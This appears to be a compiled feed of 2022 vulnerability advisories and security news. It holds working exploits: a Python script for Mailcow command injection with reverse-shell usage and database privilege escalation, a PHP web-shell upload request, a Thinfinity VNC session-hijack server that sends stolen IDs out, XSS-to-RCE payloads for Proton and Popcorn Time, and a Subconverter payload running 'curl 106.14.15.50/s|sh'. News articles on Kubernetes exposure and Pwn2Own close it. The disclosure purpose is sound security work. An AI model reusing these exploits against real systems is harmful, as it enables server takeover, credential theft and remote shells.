Rengine v1.0.2 was discovered to contain a remote code execution (RCE) vulnerability via the yaml configuration function.

https://github.com/yogeshojha/rengine

Hello, I found that there is an rce vulnerability in the yaml configuration function in the rengine 1.0.2 version.  
The yaml file can be written arbitrarily, and the background code does not verify and filter it directly into the os.system statement, which leads to this vulnerability. Take 'dirsearch as an example .  
  
  

\==============  
It should be noted that the program must scan subdomains by default before performing dirsearch scanning, so you need to wait for a while when trying to exploit rce

CVE-2022-28995: https://github.com/yogeshojha/rengine rce report · Issue #1 · zongdeiqianxing/rengine

mailcow before 2022-05d allows a remote authenticated user to inject OS commands and escalate privileges to domain admin via the --debug option in conjunction with the ---PIPEMESS option in Sync Jobs.

**Mailcow CVE-2022-31245**

CVE-2022-31245: RCE and Domain Admin privilege escalation for Mailcow. Including POC.  

Patched Version: https://github.com/mailcow/mailcow-dockerized/releases/tag/2022-05d  
CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31245

**CVE-2022-31245: Command Injection, RCE**

Severity: 3/3  
Type: Command Injection, RCE, Domain Takeover  
Affected versions: least 2019 - 2022-05c  

A flaw exists in all recent Mailcow versions where a regular user of the system can exploit the “Sync Job” feature to gain a shell using a command injection in imapsync. Using this vunerability a attacker can then easily pivot to the database and escalate privileges to the role of “Domain Admin” in Mailcow.

This exploit includes persistence by default since Sync Jobs run on a timer.

This exploit compromises the entire Mailcow instance. Tested and working on release as of 2022-05c. Patched in 2022-05d.

**Technical overview**

Using the steps below the vulnerability can be recreated.

Gaining shell:

1.  Go to the Mailcow login page (not SOGo)
2.  Login as a regular user
3.  Go to Sync Jobs
4.  Set the following values: hostname=MAILCOW_IP, Port=IMAP_PORT, Username=CURRENT_USER, Password=CURRENT_PASS, Encryption=PLAIN, Interval=1, Active=Check, Custom Parameters=--debug --nosslcheck --PIPEMESS=CMD Where the field "Custom Parameters" is the important field. CMD can be a arbitrary shell command without spaces. Using uppercase is important!
5.  Press save and wait 1 min for the command to execute.

Custom Parameters example payload:

    --debug --nosslcheck --PIPEMESS=touch${IFS}test.txt
    

CMD cannot contain space,quotes or slashes use ${IFS} instead of space. Uppercase for --PIPEMESS is important to bypass check in functions.mailbox.inc.php at line 340:

if (strpos($custom\_params, 'pipemess')) {
	$custom\_params = '';
}

This uppercase command still works due to the fact that imapsync is case insensitive.

Privilege Escalation:

1.  After gaining shell on the dovcot container run env
2.  Find DBUSER and DBPASS
3.  Login to database using mysql and credentials
4.  Create new admin user or create a new admin API-key

**Proof-of-Concept, POC**

Automated POC. POC could in some cases need modification to run against non-local Mailcow instances.

#!/bin/python3

description \= """
Mailcow authenticated RCE. Only for educational purposes!!
By: ly1g3\[at\]tuta.io
This exploit can be used to get mailcow domain admin using mysql credentials found in "env" after getting shell.
Quotes, spaces and slash cant be used in cmd. Use ${IFS} as space. End command with ; is recommended.
Example reverse shell use: --cmd 'echo${IFS}PYTHON\_REVERSE\_SHELL\_BASE64${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}sh;' where PYTHON\_REVERSE\_SHELL\_BASE64 is python reverse shell.
Example usage: ./mailcow\_poc1.py --url https://192.168.1.2 --user test@local.com --passwd testpass --cmd 'echo${IFS}PYTHON\_REVERSE\_SHELL\_BASE64${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}sh;'
"""

import requests
import urllib
import sys
from urllib.parse import urlparse
import argparse
from argparse import RawTextHelpFormatter
from datetime import datetime

parser \= argparse.ArgumentParser(description\=description, formatter\_class\=RawTextHelpFormatter)
parser.add\_argument('--url', help\='Url to the mailcow server', required\=True)
parser.add\_argument('--user', help\='Mailcow username, example test@mailcow.com', required\=True)
parser.add\_argument('--passwd', help\='Mailcow user password', required\=True)
parser.add\_argument('--cmd', help\='Command to execute', required\=True)

args \= parser.parse\_args()

base\_url \= args.url
\# hostname = urlparse(base\_url).netloc
hostname \= '127.0.0.1'
user \= args.user
password \= args.passwd
cmd \= args.cmd

\# Get the required csrf token
def find\_csrf\_token(text):
    try:
        start1 \= text.index("var csrf\_token")
        start2 \= text.index("'", start1)
        end2 \= text.index("'", start2+1)
        csrf\_token \= text\[start2+1:end2\]
        return csrf\_token
    except:
        return ""

login\_url \= base\_url + '/'

s \= requests.Session()

\# Login
r1 \= s.post(login\_url, data\={'login\_user': user, 'pass\_user': password}, verify\=False)

token \= find\_csrf\_token(r1.text)
if not token:
    print("Error no token found, login problems?")
    sys.exit(0)
print(f"CSRF token: {token}")

sync\_url \= base\_url + '/api/v1/add/syncjob'

\# Create sync job with command injection
attr \= f'{{"host1":"{hostname}","port1":"143","user1":"{user}","password1":"{password}","enc1":"PLAIN","mins\_interval":"1","subfolder2":"","maxage":"0","maxbytespersecond":"0","timeout1":"10","timeout2":"10","exclude":"(?i)spam|(?i)junk","custom\_params":"--debug --nosslcheck --PIPEMESS={cmd}","subscribeall":"1","active":"1","csrf\_token":"{token}"}}'
r2 \= s.post(sync\_url, data\={'attr': attr, 'csrf\_token': token}, verify\=False)

c \= r2.content
if c.find(b"mailbox\_modified") != \-1:
    print("Success, rule modified")
elif c.find(b"object\_exists") != \-1:
    print("ERROR: Object exists, remove existing rule before running this")
    print(c)
    sys.exit(0)
else:
    print("ERROR: Something went wrong")
    print(c)
now \= datetime.now()
current\_time \= now.strftime("%H:%M:%S")
print("Command may take 1min to execute...")
print(f"Done at: {current\_time}")

CVE-2022-31245: GitHub - ly1g3/Mailcow-CVE-2022-31245: CVE-2022-31245: RCE and domain admin privilege escalation for Mailcow

Pharmacy Management System v1.0 was discovered to contain a remote code execution (RCE) vulnerability via the component /php_action/editProductImage.php. This vulnerability allows attackers to execute arbitrary code via a crafted image file.

    # Exploit Title: Pharmacy management system - Remote Code Execution (RCE)# Date: 19/04/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15281/multi-language-pharmacy-management-system-project-source-code.html# Version: 1.0# Tested on: XAMPP, Linux# Contact: https://twitter.com/dmaral3noz# Exploit  :  You can upload a php shell file as a productImage# ------------------------------------------------------------------------------------------#                                           POC# ------------------------------------------------------------------------------------------# Request sent as base userPOST /dawapharma/dawapharma/php_action/editProductImage.php?id=1 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------208935235035266125502673738631Content-Length: 559Connection: closeCookie: PHPSESSID=d2hvmuiicg9o9jl78hc2mkneelUpgrade-Insecure-Requests: 1-----------------------------208935235035266125502673738631Content-Disposition: form-data; name="old_image"-----------------------------208935235035266125502673738631Content-Disposition: form-data; name="productImage"; filename="shell.php"Content-Type: image/jpeg<?phpif($_REQUEST['s']) {  system($_REQUEST['s']);  } else phpinfo();?></pre></body></html>-----------------------------208935235035266125502673738631Content-Disposition: form-data; name="btn"-----------------------------208935235035266125502673738631--# ResponseHTTP/1.1 302 FoundDate: Tue, 19 Apr 2022 20:43:17 GMTServer: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1X-Powered-By: PHP/8.1.2Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cachelocation: ../product.phpContent-Length: 77Connection: closeContent-Type: text/html; charset=UTF-8Image uploaded successfully{"success":true,"messages":"Successfully Updated"}# ------------------------------------------------------------------------------------------#                                   Request to webshell# ------------------------------------------------------------------------------------------GET /dawapharma/dawapharma/assets/myimages/shell.php?s=echo+0xSaudi HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: image/webp,*/*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=d2hvmuiicg9o9jl78hc2mkneel# ------------------------------------------------------------------------------------------#                                    Webshell response# ------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Tue, 19 Apr 2022 20:55:58 GMTServer: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1X-Powered-By: PHP/8.1.2Content-Length: 33Connection: closeContent-Type: text/html; charset=UTF-8…0xSaudi</pre></body></html>

CVE-2022-30887: Pharmacy Management System 1.0 Shell Upload ≈ Packet Storm

Foxit PDF Editor v11.3.1 was discovered to contain an arbitrary file upload vulnerability.

CVE-2022-28104: Security Bulletins | Foxit Software

Thinfinity VNC v4.0.0.1 contains a Cross-Origin Resource Sharing (CORS) vulnerability which can allow an unprivileged remote attacker, if they can trick a user into browse malicious site, to obtain an 'ID' that can be used to send websocket requests and achieve RCE.

**Summary**

**Name**

Thinfinity VNC v4.0.0.1 - CORS Misconfiguration to RCE

**Code name**

Clapton

**Product**

Thinfinity VNC

**Affected versions**

v4.0.0.1

**State**

Public

**Release date**

2022-05-17

**Vulnerability**

**Kind**

CORS Misconfiguration

**Rule**

134\. Insecure or unset HTTP headers - CORS

**Remote**

Yes

**CVSSv3 Vector**

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

**CVSSv3 Base Score**

8.3

**Exploit available**

Yes

**CVE ID(s)**

CVE-2022-25227

**Description**

Thinfinity VNC v4.0.0.1 contains a Cross-Origin Resource Sharing (CORS) vulnerability which can allow an unprivileged remote attacker, if they can trick a user into browse malicious site, to obtain an ID that can be used to send websocket requests and achieve RCE.

**Proof of Concept**

1.  Create a malicious site with the following content and send it to the victim.
    
        <!DOCTYPE html>
        <html>
        <body>
        <center>
        <h2>CORS Thinfinity POC Exploit</h2>
        <h3>Extract ID</h3>
        
        <div id="demo">
        <button type="button" onclick="cors()">Exploit</button>
        </div>
        
        <script>
        function cors() {
        
        var xhttp = new XMLHttpRequest();
        xhttp.onreadystatechange = function() {
            if (this.readyState == 4 && this.status == 200) {
        
                response = JSON.parse(this.responseText)
                id_str = response['id']
        
                id_str = id_str.slice(1, id_str.length - 1)
        
                alert("Exfiltrated ID: " + id_str)
                alert("Do you want to send the exploit?")
        
                const flask_http = new XMLHttpRequest();
        
                // Server to exfiltrate the websocket id
        
                // CHANGE THIS
                var exf_server = "127.0.0.1:5000"
                const url = "http://" + exf_server + "/cors?id=" + id_str
        
        
                // Send ID to flask application
                flask_http.open("GET", url)
                flask_http.send()
        
                flask_http.onreadystatechange = function() {
                        alert('Done!!!')
                }
        
            }
        };
        
        // exfiltrate ID using CORS vulnerability
        
        // CHANGE THIS
        
        var server = "172.16.28.140:8081"
        xhttp.open("GET", "http://" + server + "/vnc/cmd?cmd=connect&wscompression=true&destAddr=&screenWidth=1308&screenHeight=741&orientation=90&browserWidth=654&browserHeight=627&supportCur=true&id=null&devicePixelRatio=1&isMobile=false&isLandscape=true&supportsFullScreen=true&webapp=false", true);
        xhttp.withCredentials = true;
        xhttp.send();
        }
        
        
        </script>
        
        </body>
        </html>
        
    
2.  Create a web socket connection against the target server using the exfiltrated ID. The following PoC sends the Ctrl+Esc keystroke combination to the server.
    
        from websocket import create_connection
        import time
        
        # CHANGE THIS
        id_str ="D6647736-7489-4FA3-9620-25F2DC7FA1F6"
        
        ws = create_connection("ws://172.16.28.140:8081/vnc/%7B" + id_str + "%7D")
        command = "cmd=fkey&key=CtrlEsc&id={" + id_str + "}"
        ws.send(command)
        
    
3.  The exploit below can be used to send arbitrary commands to the server after the ID is exfiltrated. It uses the ID to hijack the VNC connection and send keystrokes or mouse moves to the server.
    

**Exploit**

*   Run the flask application and trick a user with a session in Thinfinity to visit the page.

    
    # export FLASK_APP=exploit_thinfinity
    # flask run --host=0.0.0.0
    
    from flask import Flask, request, redirect
    from websocket import create_connection
    import time
    import socket
    
    app = Flask(__name__)
    
    
    # CHANGE THIS
    server = "192.168.1.7:8081"
    
    
    def current_ip():
        return([l for l in ([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith("127.")][:1], [[(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) if l][0][0])
    
    
    def send_enter(ws, str_id):
        ws.send("cmd=keyb&key=13&char=0&action=down&id={" + str_id + "}")
        time.sleep(1)
    
    def send_ctrl_esc(ws, str_id):
        ws.send("cmd=fkey&key=CtrlEsc&id={%s}" % str_id)
        time.sleep(1)
    
    def send_text(ws, cmd, str_id):
    
        for c in cmd:
            key = str(ord(c))
    
            command  = "cmd=keyb&key=66&action=down&id={%s}&char=%s&location=0" % (str_id,key)
            ws.send(command)
            time.sleep(0.2)
    
        time.sleep(2)
    
    
    @app.route("/exploit")
    def about():
    
        ip = request.host.split(':')[0]
    
        return """
            <!DOCTYPE html>
            <html>
            <body>
            <center>
            <h2>CORS Thinfinity POC Exploit</h2>
            <h3>Extract ID</h3>
    
            <div id="demo">
            <button type="button" onclick="cors()">Exploit</button>
            </div>
    
            <script>
            function cors() {
    
            var xhttp = new XMLHttpRequest();
            xhttp.onreadystatechange = function() {
                if (this.readyState == 4 && this.status == 200) {
    
                    response = JSON.parse(this.responseText)
                    id_str = response['id']
    
                    id_str = id_str.slice(1, id_str.length - 1)
    
                    alert("Exfiltrated ID: " + id_str)
                    alert("Do you want to send the exploit?")
    
                    const flask_http = new XMLHttpRequest();
    
                    // Server to exfiltrate the websocket id
    
                    // CHANGE THIS
                    var exf_server = "%s:5000"
                    const url = "http://" + exf_server + "/cors?id=" + id_str
    
    
                    // Send ID to flask application
                    flask_http.open("GET", url)
                    flask_http.send()
    
                    flask_http.onreadystatechange = function() {
                            alert('Done!!!')
                    }
    
                }
            };
    
            // exfiltrate ID using CORS vulnerability
    
            // CHANGE THIS
    
            var server = "%s"
            xhttp.open("GET", "http://" + server + "/vnc/cmd?cmd=connect&wscompression=true&destAddr=&screenWidth=1308&screenHeight=741&orientation=90&browserWidth=654&browserHeight=627&supportCur=true&id=null&devicePixelRatio=1&isMobile=false&isLandscape=true&supportsFullScreen=true&webapp=false", true);
            xhttp.withCredentials = true;
            xhttp.send();
            }
    
    
            </script>
            </body>
            </html>
        """ % (ip, server)
    
    
    @app.route('/cors',methods=['GET'])
    def cors():
        str_id = request.args.get('id')
        print(str_id)
    
    
    
        socket_url = "ws://" + server +  "/vnc/%7B"+ str_id +"%7D"
        ws = create_connection(socket_url)
    
        send_ctrl_esc(ws,str_id)
    
        send_text(ws,"run",str_id)
        send_enter(ws,str_id)
    
        send_text(ws,"calc.exe",str_id)
        send_enter(ws,str_id)
    
        return str_id
    
    @app.route("/")
    def index():
        return redirect('/exploit')
    

**Mitigation**

By 2022-05-17 there is not a patch resolving the issue.

**Credits**

The vulnerability was discovered by Oscar Uribe from the Offensive Team of Fluid Attacks.

**References**

**Vendor page** https://www.cybelesoft.com/thinfinity/

**Timeline**

2022-04-11

Vulnerability discovered.

2022-04-11

Vendor contacted.

2022-05-17

Public Disclosure.

CVE-2022-25227: Thinfinity VNC v4.0.0.1 - CORS Misconfiguration to RCE | Fluid Attacks

**Summary**

**Name**

Proton v0.2.0 - XSS To RCE

**Code name**

Lennon

**Product**

Proton Markdown

**Affected versions**

Version 0.2.0

**State**

Public

**Release date**

2022-05-17

**Vulnerability**

**Kind**

XSS to RCE

**Rule**

010\. Stored cross-site scripting (XSS)

**Remote**

No

**CVSSv3 Vector**

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N

**CVSSv3 Base Score**

7.1

**Exploit available**

No

**CVE ID(s)**

CVE-2022-25224

**Description**

Proton **v0.2.1** allows an attacker to create a malicious link inside a markdown file. When the victim clicks the link, the application opens the site in the current frame allowing an attacker to host JavaScript code in the malicious link in order to trigger an XSS attack. The nodeIntegration configuration is set to **on** which allows the webpage to use NodeJs features, an attacker can leverage this to run OS commands.

**Proof of Concept****Steps to reproduce**

1.  Create a markdown file with the following content.
    
        [Click me!!!](http://192.168.1.67:8002/rce.html)
        
    
2.  Host the rce.html file with the following content on a server controlled by the attacker.
    
         <script>
             require('child_process').exec('calc');
         </script>
        
    
3.  Send the markdown file to the victim. When the victim clicks the markdown link the site will be open inside electron and the JavaScript code will spawn a calculator.
    

**System Information**

*   Version: Proton v0.2.1.
*   Operating System: Windows 10.0.19042 N/A Build 19042.
*   Installer: Proton.Setup.0.2.0.exe

**Exploit**

There is no exploit for the vulnerability but can be manually exploited.

**Mitigation**

By 2022-05-17 there is not a patch resolving the issue.

**Credits**

The vulnerability was discovered by Oscar Uribe from the Offensive Team of Fluid Attacks.

**References**

**Vendor page** https://github.com/steventhanna/proton/

**Timeline**

2022-04-29

Vulnerability discovered.

2022-04-29

Vendor contacted.

2022-05-17

Public Disclosure.

CVE-2022-25227: Proton v0.2.0 - XSS To RCE | Fluid Attacks

Popcorn Time 0.4.7 has a Stored XSS in the 'Movies API Server(s)'' field via the 'settings' page. The 'nodeIntegration' configuration is set to on which allows the webpage to use 'NodeJs' features, an attacker can leverage this to run OS commands.

1.  Home
2.  Advisories
3.  Popcorn Time 0.4.7 XSS to RCE

**Summary**

**Name**

Popcorn Time 0.4.7 - XSS to RCE

**Code name**

Bowie

**Product**

Popcorn Time

**Affected versions**

Version 0.4.7 (Just Keep Swimming)

**State**

Public

**Release date**

2022-05-17

**Vulnerability**

**Kind**

XSS to RCE

**Rule**

010\. Stored cross-site scripting (XSS)

**Remote**

No

**CVSSv3 Vector**

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N

**CVSSv3 Base Score**

7.7

**Exploit available**

No

**CVE ID(s)**

CVE-2022-25229

**Description**

Popcorn Time 0.4.7 has a Stored XSS in the Movies API Server(s) field via the settings page. The nodeIntegration configuration is set to **on** which allows the webpage to use NodeJs features, an attacker can leverage this to run OS commands.

**Proof of Concept****Steps to reproduce**

1.  Open the Popcorn time application.
    
2.  Go to settings.
    
3.  Enable Show advanced settings.
    
4.  Scroll down to the API Server(s) section.
    
5.  Insert the following PoC inside the Movies API Server(s) field and click on Check for updates.
    

    a"><script>require('child_process').exec('calc');</script>
    

6.  Scroll down to the Database section and click on Export database.
    
7.  The application will create a .zip file with the current configuration.
    
8.  Send the configuration to the victim.
    
9.  The victim must go to Settings -> Database and click on Import Database
    
10.  When the victim restarts the application the XSS will be triggered and will run the calc command.
    

**System Information**

*   Version: Popcorn Time 0.4.7.
*   Operating System: Windows 10.0.19042 N/A Build 19042.
*   Installer: Popcorn-Time-0.4.7-win64-Setup.exe

**Exploit**

There is no exploit for the vulnerability but can be manually exploited.

**Mitigation**

An updated version of PopcornTime is available at the vendor page.

**Credits**

The vulnerability was discovered by Oscar Uribe from the Offensive Team of Fluid Attacks.

**References**

**Vendor page** https://github.com/popcorn-official/popcorn-desktop

**Issue** https://github.com/popcorn-official/popcorn-desktop/issues/2491

**Timeline**

2022-04-26

Vulnerability discovered.

2022-04-26

Vendor contacted.

2022-05-04

Vendor Confirmed the vulnerability.

2022-05-07

Vulnerability patched.

2022-05-17

Public Disclosure.

CVE-2022-25229: Popcorn Time 0.4.7 - XSS to RCE | Fluid Attacks

More than 380,000 of the 450,000-plus servers hosting the open-source container-orchestration engine for managing cloud deployments allow some form of access.

More than 380,000 of the 450,000-plus servers hosting the open-source container-orchestration engine for managing cloud deployments allow some form of access.

More than 380,000 Kubernetes API servers allow some kind of access to the public internet, making the popular open-source container-orchestration engine for managing cloud deployments an easy target and broad attack surface for threat actors, researchers have found.

The Shadowserver Foundation discovered the access when it scanned the internet for Kubernetes API servers, of which there are more than 450,000, according to a blog post published this week.

“ShadowServer is conducting daily scans of the IPv4 space on ports 443 and 6443, looking for IP addresses that respond with an ‘HTTP 200 OK status,’ which indicates that the request has succeeded,” according to the post.

Of the more than 450,000 Kubernetes API instances identified by Shadowserver, 381,645 responded with “200 OK,” researchers said. In all, Shadowserver found 454,729 Kubernetes API servers. The “open” API instances thus constitute nearly 84 percent of all instances that that Shadowserver scanned.

Moreover, most of the accessible Kubernetes servers—201,348, or nearly 53 percent–were found in the United States, according to the post.

While this response to the scan does not mean these servers are fully open or vulnerable to attacks, it does create a scenario in which the servers have an “unnecessarily exposed attack surface,” according to the post.

“This level of access was likely not intended,” researchers observed. The exposure also allows for information leakage on version and builds, they added.

****Cloud Under Attack****

The findings are troubling given that attackers already increasingly have been targeting Kubernetes cloud clusters as well as using them to launch other attacks against cloud services. Indeed, the cloud historically has suffered from rampant misconfiguration that continues to plague deployments, with Kubernetes being no exception.

In fact, Erfan Shadabi, cybersecurity expert with data-security firm comforte AG, said in an email to Threatpost that he was not surprised that the Shadowserver scan turned up so many Kubernetes servers exposed to the public internet.

“White \[Kubernetes\] provides massive benefits to enterprises for agile app delivery, there are a few characteristics that make it an ideal attack target for exploitation,” he said. “For instance, as a result of having many containers, Kubernetes has a large attack surface that could be exploited if not pre-emptively secured.”

****Open-Source Security Exposed****

The findings also raise the perennial issue of how to build security into open-source systems that become ubiquitous as part of modern internet and cloud-based infrastructure, making an attack on them an attack on the myriad systems to which they are connected.

This issue was highlighted all-too-unfortunately in the case of the Log4Shell vulnerability in the ubiquitous Java logging library Apache Log4j that was discovered last December.

The flaw, which is easily exploitable and can allow unauthenticated remote code execution (RCE) and complete server takeover–continues to be targeted by attackers. In fact,  a recent report finding millions of Java applications still vulnerable despite a patch being available for Log4Shell.

An Achilles heel in particular of Kubernetes is that the data-security capabilities built into the platform are only at a “bare minimum”–protecting data at rest and data in motion, Shadabi said. In a cloud environment, this is a dangerous prospect.

“There’s no persistent protection of data itself, for example using industry accepted techniques like field-level tokenization,” he observed. “So if an ecosystem is compromised, it’s only a matter of time before the sensitive data being processed by it succumbs to a more insidious attack.”

Shadabi’s advice to organizations that use containers and Kubernetes in their production environments is to take securing Kubernetes as seriously as they do all aspects of their IT infrastructure, he said.

For its part, Shadowserver recommended that if administrators find that a Kubernetes instance in their environment is accessible to the internet, they should consider implementing authorization for access or block at the firewall level to reduce the exposed attack surface.

380K Kubernetes API Servers Exposed to Public Internet

By Waqas
Other than Windows 11, Microsoft Teams and Mozilla Firefox, Oracle Virtualbox, Ubuntu Desktop, and Safari browser were also…
This is a post from HackRead.com Read the original post: Pwn2Own 2022 – Windows 11, MS Teams and Firefox Pwned on Day 1

Other than Windows 11, Microsoft Teams and Mozilla Firefox, Oracle Virtualbox, Ubuntu Desktop, and Safari browser were also hacked on day one of PWN2OWN 2022 in Vancouver.

Pwn2Own is a hacking contest where white hate hackers come forward and compete against each other and earn thousands of dollars for detecting unknown vulnerabilities in popular software/OS. On the first day of the 15th edition of Pwn2Own, vulnerability researchers earned around $800,000.

According to the event organizer, Trend Micro’s Zero Day Initiative (ZDI), this was the highest single-day award amount ever won in this contest. All the ten hacking attempts were successful. The competition will conclude on Friday.

It is worth noting that this is the second edition of Pwn2Own in 2022. The first edition was held in Miami and focused mainly on ICS (industrial control systems). Participants earned $400,000 for successful exploits.

**Microsoft Teams Exploits “Stole” the Show**

Around $450,000 out of the total awarded sum of $800,000 was won by hackers who detected vulnerabilities in Microsoft Teams. Hackers exploited sixteen zero-day vulnerabilities against Windows 11, MS Teams, Firefox, Ubuntu, Oracle VirtualBox, and Safari. Hackers will again target Teams on the last day of Pwn2Own, on Friday.

For MS Teams, $150,000 were awarded for each of the 3 exploit chains leveraged by Masato Kinugawa, Hector Peralta (p3rr0), and the STAR Labs team comprising Billy Jheng Bing-Jhong, Muhammad Alifa Ramdhan, and Nguyễn Hoàng Thạch.

According to ZDI’s blog post, Peralta demonstrated an improper configuration. Kinugawa exploited a 3-bug chain, including a sandbox escape, a configuration, and an injection, while the STAR Labs team leveraged an arbitrary file write flaw and injection using a zero-click remote code execution exploit on Oracle VirtualBox.

**More Pwn and Bug Bounty News**

1.  Bug bounty: Hack Tesla Model 3 to win your own Model 3
2.  Hack the US Army for good with ‘Hack The Army’ bug bounty program
3.  Microsoft Exchange server, Teams, Zoom, Chrome pwned at Pwn2Own
4.  Xiaomi, Amazon Echo, Sony & Samsung Smart TVs pwned at Pwn2Own
5.  iPhone 13 Pro, Windows, Chrome, Linux and others pwned at Tianfu Cup

**Other Successful Exploits**

Manfred Paul won $100,000 for identifying a sandbox escape exploit in Mozilla Firefox, which involved improper input validation and prototype pollution, and an additional $50,000 for an out-of-band write on Apple Safari.

Other hackers won $40,000 each for the rest of the exploits. This includes Marcin Wiązowski, who executed an out-of-bounds write privilege escalation on MS Windows 11. Team Orca of Sea Security executed two bugs on the Ubuntu desktop, STAR Labs’ Phan Thanh Duy and Lê Hữu Quang Linh exploited MS Windows 11 with a Use-After-Free elevation of privilege. Keith Yeo performed a Use-After-Free exploit on Ubuntu Desktop.

On Thursday, Pwn2Own’s second day, researchers will hack a Tesla Model 3, and successful attempts will grant them up to a $600,000 bounty plus a new Tesla.

**_Did you enjoy reading this article? Do like our page on Facebook and follow us on Twitter._**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Pwn2Own 2022 – Windows 11, MS Teams and Firefox Pwned on Day 1

A remote code execution (RCE) vulnerability in Subconverter v0.7.2 allows attackers to execute arbitrary code via crafted config and url parameters.

Software Link(Subconverter): https://github.com/tindy2013/subconverter

Affected versions: Subconverter v0.7.2, < v0.7.2-ce8d2bd

**Description**

A remote code execution (RCE) vulnerability in Subconverter v0.7.2 allows unauthorized attackers to execute arbitrary code via crafted config and url parameters.

Unauthorized attackers can use this vulnerability to leak the authorize token and become authorized user, or leak other user's privacy info, or even taking down the server.

**Steps to reproduce**

*   1.  Host a evil JavaScript file with HTTP, with a function named parse(x). os.exec from quickjs can be used to call system commands.
    
    //http://106.14.15.50/testxz.js
    
    function parse(x){
            os.exec(\["sh","-c","curl 106.14.15.50/s|sh"\],{file:"sh"})
    }
    
*   2.  Calculate the md5 for the evil JavaScript file URL. For example: The md5 of http://106.14.15.50/testxz.js is c10dca9bf2e82a5ec6293ceba3cee6bc.
*   3.  Access the remote server with crafted config and url parameters, twice. The first time we access, the evil JavaScript file will be downloaded to ./cache/<md5_of_evil_js_url>. The second time we access, the evil JavaScript from cache will be loaded and the parse(x) function in evil JavaScript will be called.
        
        # http://SERVER\_IP/sub?config=<evil\_js\_url>&target=clash&url=script:cache/<md5\_of\_evil\_js\_url>,114514
        
        curl 'http://SERVER\_IP/sub?config=http://106.14.15.50/testxz.js&target=clash&url=script:cache/c10dca9bf2e82a5ec6293ceba3cee6bc,114514'
        curl 'http://SERVER\_IP/sub?config=http://106.14.15.50/testxz.js&target=clash&url=script:cache/c10dca9bf2e82a5ec6293ceba3cee6bc,114514'
        
*   4.  We can see that the code in evil JavaScript file is executed, the reverse shell has taken place.
        

**Fix**

Subconverter v0.7.2-ce8d2bd has fixed this issue by only allowing authorized user or when the server is running with config api_mode = false (insecure mode, assumes any user is authorized) to use script: URL.

If you are using a Subconverter version below v0.7.2-ce8d2bd, you should upgrade to v0.7.2-ce8d2bd or higher to fix the RCE vulnerability. If you are not able to upgrade, you can set enable_cache = false in your config file and clear local ./cache folder to mitigate the vulnerability. Be aware though this will disable caching and may cost you more bandwidth.

It is recommended that you change your api_access_token as well as it may already be compromised.

NOTE: It is still possible to RCE on v0.7.2-ce8d2bd by authorized user or when the server is running with config api_mode = false , this is confirmed to be 'not a vulnerability' by the author.

Tag

#rce